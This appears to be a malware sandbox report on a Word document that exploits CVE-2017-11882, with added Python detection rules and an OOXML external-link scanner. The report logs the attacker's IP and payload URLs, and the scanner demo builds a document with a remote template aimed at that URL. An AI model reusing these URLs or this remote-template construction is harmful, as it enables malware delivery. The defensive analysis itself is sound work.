File name: 91bf47893f29474afd3a49d3786b376d378766153409bb3aa75a6b24f6c300e9.doc
Full analysis: https://app.any.run/tasks/55e2e51e-a810-42cd-8bfb-2b6f2f619c6e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 19, 2019, 01:16:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: opendir, loader, exploit, CVE-2017-11882
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5: 0D5B5992DB119F6F3E4086677C72D8B0
SHA1: 5968BF2F158D75C991B1A8E4CB62CEFF121D48DA
SHA256: 91BF47893F29474AFD3A49D3786B376D378766153409BB3AA75A6B24F6C300E9
SSDEEP: 192:A2TLQUEPyMtWNbv0mqQTnhr5OJQT1QWP55xMbFTB8GoA6aBkWA5mN:DTLiyMtibhLOJQT1QWDx6dVImN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • Jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exe (PID: 3120)
    • Downloads executable files from the Internet
      • EQNEDT32.EXE (PID: 3608)
    • Downloads executable files from IP
      • EQNEDT32.EXE (PID: 3608)
    • Suspicious connection from the Equation Editor
      • EQNEDT32.EXE (PID: 3608)
    • Equation Editor starts application (CVE-2017-11882)
      • EQNEDT32.EXE (PID: 3608)
  • SUSPICIOUS
    • Unusual connect from Microsoft Office
      • WINWORD.EXE (PID: 2872)
    • Executable content was dropped or overwritten
      • EQNEDT32.EXE (PID: 3608)
    • Executed via COM
      • EQNEDT32.EXE (PID: 3608)
  • INFO
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2872)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2872)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK matrix in the full report.
Malware configuration: none extracted.
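The indicators above describe one chain: WINWORD.EXE (PID 2872) opens the document and fetches an RTF from 185.250.240.84; the Equation Editor, EQNEDT32.EXE (PID 3608), is started through COM (its parent is svchost.exe, not Word), triggers the CVE-2017-11882 behaviour, downloads WDefender.exe from the same host, writes an EXE into the user's AppData\Local and runs it (PID 3120). The detection gotcha is the COM launch: a rule that only looks for "Office spawns a child process" never sees EQNEDT32.EXE, so the rules have to key on the Equation Editor itself. The following is an added example, not code from the ANY.RUN report: it runs four such rules over constructed Sysmon-style records (EventID 1 = process create, 3 = network connect, 11 = file create) built to mirror the report's process tree. The record format, the benign noise events and the rule names are assumptions for illustration.

```python
"""Flag Equation Editor (EQNEDT32.EXE) abuse in endpoint telemetry.

Added example, not part of the ANY.RUN report. The records below are
constructed to mirror the report's process tree (WINWORD.EXE 2872,
EQNEDT32.EXE 3608 started via COM with svchost.exe as parent, dropped
EXE 3120). Field names follow Sysmon conventions; the input shape is an
assumption, not the sandbox's raw format.
"""
import ipaddress
import ntpath
from typing import Dict, List

EQUATION_EDITOR = "eqnedt32.exe"
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".com")
EQN_PATH = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WORD_PATH = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
DROPPED = r"C:\Users\admin\AppData\Local\Jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exe"

# Constructed sample telemetry (not the report's raw logs).
EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "ProcessId": "2872", "Image": WORD_PATH, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": "3", "ProcessId": "2872", "Image": WORD_PATH,
     "DestinationIp": "185.250.240.84", "DestinationPort": "80", "DestinationHostname": ""},
    # The exploit host process is launched by DCOM: parent is svchost.exe, not WINWORD.EXE.
    {"EventID": "1", "ProcessId": "3608", "Image": EQN_PATH, "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": "3", "ProcessId": "3608", "Image": EQN_PATH,
     "DestinationIp": "185.250.240.84", "DestinationPort": "80", "DestinationHostname": ""},
    {"EventID": "11", "ProcessId": "3608", "Image": EQN_PATH, "TargetFilename": DROPPED},
    {"EventID": "1", "ProcessId": "3120", "Image": DROPPED, "ParentImage": EQN_PATH},
    # Benign noise (constructed): Equation Editor opened to edit a formula; Word syncs to a named host.
    {"EventID": "1", "ProcessId": "4100", "Image": EQN_PATH, "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": "3", "ProcessId": "2872", "Image": WORD_PATH,
     "DestinationIp": "13.107.6.171", "DestinationPort": "443", "DestinationHostname": "officeclient.microsoft.com"},
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def _is_public(ip: str) -> bool:
    """True for a routable address; False for private/loopback/link-local or unparseable input."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_multicast)


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per event that matches an Equation Editor abuse rule."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        image, parent = _base(ev.get("Image", "")), _base(ev.get("ParentImage", ""))
        eid, pid = ev.get("EventID"), ev.get("ProcessId", "?")
        dest = f'{ev.get("DestinationIp", "")}:{ev.get("DestinationPort", "")}'

        # Rule 1: any process whose parent is EQNEDT32.EXE. The Equation Editor has no
        # legitimate reason to spawn children ("Equation Editor starts application").
        if eid == "1" and parent == EQUATION_EDITOR:
            findings.append({"rule": "eqnedt32_spawns_child", "severity": "malicious", "pid": pid, "detail": image})
        # Rule 2: EQNEDT32.EXE making any network connection.
        if eid == "3" and image == EQUATION_EDITOR:
            findings.append({"rule": "eqnedt32_network", "severity": "malicious", "pid": pid, "detail": dest})
        # Rule 3: EQNEDT32.EXE writing a PE to disk ("Executable content was dropped").
        if eid == "11" and image == EQUATION_EDITOR and ev.get("TargetFilename", "").lower().endswith(PE_EXTENSIONS):
            findings.append({"rule": "eqnedt32_drops_pe", "severity": "suspicious", "pid": pid,
                             "detail": ev["TargetFilename"]})
        # Rule 4: an Office process connecting to a public IP literal with no resolved hostname.
        # Office talks to Microsoft endpoints by name all day, so only the dotted-quad case is flagged.
        if (eid == "3" and image in OFFICE_APPS and not ev.get("DestinationHostname")
                and _is_public(ev.get("DestinationIp", ""))):
            findings.append({"rule": "office_connects_to_ip_literal", "severity": "suspicious", "pid": pid, "detail": dest})
    return findings


def rules_fired(events: List[Dict[str, str]]) -> Dict[str, int]:
    """Rule name -> hit count, for a quick triage summary."""
    counts: Dict[str, int] = {}
    for f in detect(events):
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f'{f["severity"]:<10} {f["rule"]:<30} pid={f["pid"]} {f["detail"]}')
```

Against the constructed events each rule fires once and the benign Equation Editor launch (PID 4100) and the named-host Office connection stay quiet; in production, rule 4 still needs an allowlist because legitimate software occasionally connects by IP.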

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

XMP

Creator: Microsoft

XML

ModifyDate: 2017:09:24 17:27:00Z
CreateDate: 2017:09:24 17:26:00Z
RevisionNumber: 1
LastModifiedBy: Microsoft
AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 7
LinksUpToDate: No
Company: SPecialiST RePack
TitlesOfParts: -
HeadingPairs: Название ("Title"), 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 7
Words: 1
Pages: 1
TotalEditTime: 1 minute
Template: dotm.dotm

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1422
ZipCompressedSize: 358
ZipCRC: 0x82872409
ZipModifyDate: 2019:09:18 08:54:18
ZipCompression: Deflated
ZipBitFlag: 0x0002
ZipRequiredVersion: 20
All screenshots are available in the full report
Total processes: 35
Monitored processes: 3
Malicious processes: 1
Suspicious processes: 2

Behavior graph

The interactive graph is in the full report. Chain shown: explorer.exe starts WINWORD.EXE; EQNEDT32.EXE (launched via COM, parent svchost.exe) drops and starts "Jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exe".

Process information

PID 2872: WINWORD.EXE
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\91bf47893f29474afd3a49d3786b376d378766153409bb3aa75a6b24f6c300e9.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 3608: EQNEDT32.EXE
  CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Parent process: svchost.exe (the -Embedding switch and the svchost.exe parent mean the Equation Editor was started as an out-of-process COM server on Word's behalf, not as a child of WINWORD.EXE; this is why the "Executed via COM" indicator fires and why parent-child rules anchored on WINWORD.EXE miss it)
  User: admin
  Company: Design Science, Inc.
  Integrity Level: MEDIUM
  Description: Microsoft Equation Editor
  Exit code: 0
  Version: 00110900

PID 3120: Jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exe
  CMD: "C:\Users\admin\AppData\Local\Jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exe"
  Path: C:\Users\admin\AppData\Local\Jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exe
  Parent process: EQNEDT32.EXE
  User: admin
  Integrity Level: MEDIUM
  Description: CheaterChat_app (version-resource string of the dropped binary; presumably the file PID 3608 fetched as WDefender.exe, though the report does not state this link explicitly)
  Version: 1.0.0.0
Total events: 1 306
Read events: 927
Write events: 0
Delete events: 0
Modification events: no data

Executable files: 2
Suspicious files: 24
Text files: 6
Unknown types: 2

Dropped files (as listed in this summary; the counts above show more files in the full report)

PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\CVR8D21.tmp.cvr
  MD5 / SHA256: not listed
PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\{3EEF5842-FF54-4DA2-804D-A515DB5B1E56}
  MD5 / SHA256: not listed
PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\{2575BAE7-EBB6-4161-B391-FA2F501D9F7A}
  MD5 / SHA256: not listed
PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C80342F.rtf
  MD5 / SHA256: not listed
PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76C4BD15.rtf
  MD5 / SHA256: not listed
PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF (binary)
  MD5: 26DCD08942D12843AD248713682EBBC0
  SHA256: 4161F999607A21DC748F4E475D8315D4DBA57BFF20BBBE749089C73A5FF7683C
PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\~$bf47893f29474afd3a49d3786b376d378766153409bb3aa75a6b24f6c300e9.doc (pgc)
  MD5: B94CAB6FFEA885718D0DBB38B857A072
  SHA256: 6ED798B09C571CF57F979F04B7AC2C203B85A134E0AC856B91FC60D833E35555
PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm (pgc)
  MD5: C6CCA38B653CB96CEE4D992EC1160316
  SHA256: 77F064971B2635212437CD454AD10DE0235CB7328581A6ADBE5D417BDE35AD12
PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{FB14BAFE-5382-4EC2-A755-ADFA4E1E9E52}.FSD (binary)
  MD5: 86BBA6BBD3A9762FF6B8BD19EF71A0BA
  SHA256: D8528EF48BB2B580EC4E006D82B1D1BB0D9F91EB70395EA9AF5B3C396B05B27C
PID 2872, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (binary)
  MD5: 95DE89F5381D88C8BA492D6B8304AD89
  SHA256: B72C48DDE70E52AB0183511EF34B8EC1DFCE4C7401BDA41BC1EDD457CF2F4AF4

The two .rtf files under Content.MSO are where Word caches content it retrieves over HTTP, so they are likely local copies of the Wdefender.rtf that WINWORD.EXE requested from 185.250.240.84 (see the HTTP requests below); the report does not list their hashes here, so this remains an inference for the analyst to confirm in the full report.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 4
DNS requests: 2
Threats: 0 (this summary counter disagrees with the Threats table below, which lists eight Emerging Threats (ET) signature alerts; use the table, not the counter)

HTTP requests

PID  | Process      | Method   | Code | IP                | URL                                       | CN      | Type       | Size    | Reputation
984  | svchost.exe  | OPTIONS  | 200  | 185.250.240.84:80 | http://185.250.240.84/                    | unknown | -          | -       | malicious
2872 | WINWORD.EXE  | GET      | 304  | 185.250.240.84:80 | http://185.250.240.84/files/Wdefender.rtf | unknown | text       | 4.60 Kb | malicious
2872 | WINWORD.EXE  | GET      | 304  | 185.250.240.84:80 | http://185.250.240.84/files/Wdefender.rtf | unknown | text       | 4.60 Kb | malicious
3608 | EQNEDT32.EXE | GET      | 200  | 185.250.240.84:80 | http://185.250.240.84/files/WDefender.exe | unknown | executable | 303 Kb  | malicious
2872 | WINWORD.EXE  | GET      | 200  | 185.250.240.84:80 | http://185.250.240.84/files/Wdefender.rtf | unknown | text       | 4.60 Kb | malicious
984  | svchost.exe  | PROPFIND | 405  | 185.250.240.84:80 | http://185.250.240.84/                    | unknown | html       | 226 b   | malicious
984  | svchost.exe  | PROPFIND | 405  | 185.250.240.84:80 | http://185.250.240.84/                    | unknown | html       | 226 b   | malicious

Reading the table: WINWORD.EXE fetched Wdefender.rtf three times (one 200 and two 304 Not Modified re-requests of the same resource), and EQNEDT32.EXE, not Word, pulled down the 303 Kb executable. The OPTIONS and PROPFIND requests from svchost.exe (PID 984) are WebDAV probes: the Windows WebClient service tries the host over WebDAV when Office resolves an http:// URL, and the 405 responses show the server does not serve WebDAV. They are a side effect of the sample's URL, not separate attacker activity; the "malicious" reputation belongs to the host and is attached to every row.
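Word requesting an RTF from the attacker's server before the Equation Editor fires is how a remote template reference in an OOXML document behaves: the .docx itself holds only a relationship with TargetMode="External", and Word fetches the target (here an RTF carrying the CVE-2017-11882 object) when the document opens. The report does not show the sample's internal relationship parts, so the following is an added example rather than the analysed file's contents: it builds a constructed .docx with an external attachedTemplate relationship pointing at the URL the report shows, then walks every .rels part looking for external targets, the static check an analyst would run on a suspicious .docx before detonating it. The document structure, relationship IDs and triage labels are assumptions for illustration.

```python
"""Find external (remote) relationship targets inside an OOXML document.

Added example, not part of the ANY.RUN report. The .docx built below is
constructed for illustration; it is not the analysed sample, whose
relationship parts the report does not show.
"""
import io
import ipaddress
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List, Optional
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Relationship types whose remote targets are worth a second look (assumed triage list).
INTERESTING = {"attachedTemplate", "oleObject", "frame", "subDocument", "image"}


def build_sample_docx(template_url: Optional[str]) -> bytes:
    """Construct a minimal .docx; with template_url set, word/_rels/settings.xml.rels
    carries an external attachedTemplate relationship pointing at it."""
    template_rel = ""
    if template_url:
        template_rel = (f'<Relationship Id="rId1" Type="{REL_TYPE_BASE}attachedTemplate" '
                        f'Target="{template_url}" TargetMode="External"/>')
    settings_rels = f'<Relationships xmlns="{RELS_NS}">{template_rel}</Relationships>'
    document_rels = (f'<Relationships xmlns="{RELS_NS}">'
                     f'<Relationship Id="rId1" Type="{REL_TYPE_BASE}settings" Target="settings.xml"/>'
                     '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>')
        z.writestr("word/settings.xml", f'<w:settings xmlns:w="{W_NS}"/>')
        z.writestr("word/_rels/document.xml.rels", document_rels)
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def _host_is_ip_literal(url: str) -> bool:
    """True when the URL's host is a bare IP address (the 'dotted quad' the ET rules key on)."""
    host = urlsplit(url).hostname or ""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def find_external_relationships(docx_bytes: bytes) -> List[Dict[str, str]]:
    """Return every TargetMode="External" relationship found in any .rels part of the package."""
    hits: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                # A rels part that does not parse is itself a finding; record it instead of skipping.
                hits.append({"part": name, "type": "unparseable", "target": "", "ip_literal_host": "False"})
                continue
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                hits.append({"part": name,
                             "type": rel.get("Type", "").rsplit("/", 1)[-1],
                             "target": target,
                             "ip_literal_host": str(_host_is_ip_literal(target))})
    return hits


def triage(docx_bytes: bytes) -> List[str]:
    """One line per external relationship, marking template/OLE targets and IP-literal hosts."""
    lines = []
    for h in find_external_relationships(docx_bytes):
        flags = []
        if h["type"] in INTERESTING:
            flags.append("REMOTE-" + h["type"].upper())
        if h["ip_literal_host"] == "True":
            flags.append("IP-LITERAL-HOST")
        lines.append(f'{h["part"]}: {h["type"]} -> {h["target"]} [{" ".join(flags) or "review"}]')
    return lines


if __name__ == "__main__":
    # Constructed stand-in for the analysed document (its real rels are not shown in the report).
    sample = build_sample_docx("http://185.250.240.84/files/Wdefender.rtf")
    print("\n".join(triage(sample)) or "no external relationships")
```

Run it on any real .docx by passing the file bytes to triage(); an external attachedTemplate, oleObject or frame target, especially one on an IP-literal host, is the static counterpart of the "Dotted Quad Host RTF Request" alerts in the Threats table.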

Connections

PID  | Process      | IP                | Domain | ASN | CN | Reputation
3608 | EQNEDT32.EXE | 185.250.240.84:80 | -      | -   | -  | malicious
2872 | WINWORD.EXE  | 185.250.240.84:80 | -      | -   | -  | malicious
984  | svchost.exe  | 185.250.240.84:80 | -      | -   | -  | malicious

DNS requests

Domain           | IP              | Reputation
dns.msftncsi.com | 131.107.255.255 | shared (Windows network connectivity status probe, not sample activity)

Threats

PID  | Process      | Class                                 | Message
2872 | WINWORD.EXE  | Potentially Bad Traffic               | ET INFO Dotted Quad Host RTF Request
2872 | WINWORD.EXE  | Potentially Bad Traffic               | ET INFO Dotted Quad Host RTF Request
2872 | WINWORD.EXE  | Potentially Bad Traffic               | ET INFO Dotted Quad Host RTF Request
3608 | EQNEDT32.EXE | A Network Trojan was detected         | ET INFO Executable Download from dotted-quad Host
3608 | EQNEDT32.EXE | A Network Trojan was detected         | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3608 | EQNEDT32.EXE | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3608 | EQNEDT32.EXE | A Network Trojan was detected         | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3608 | EQNEDT32.EXE | Potentially Bad Traffic               | ET INFO SUSPICIOUS Dotted Quad Host MZ Response

Debug info: none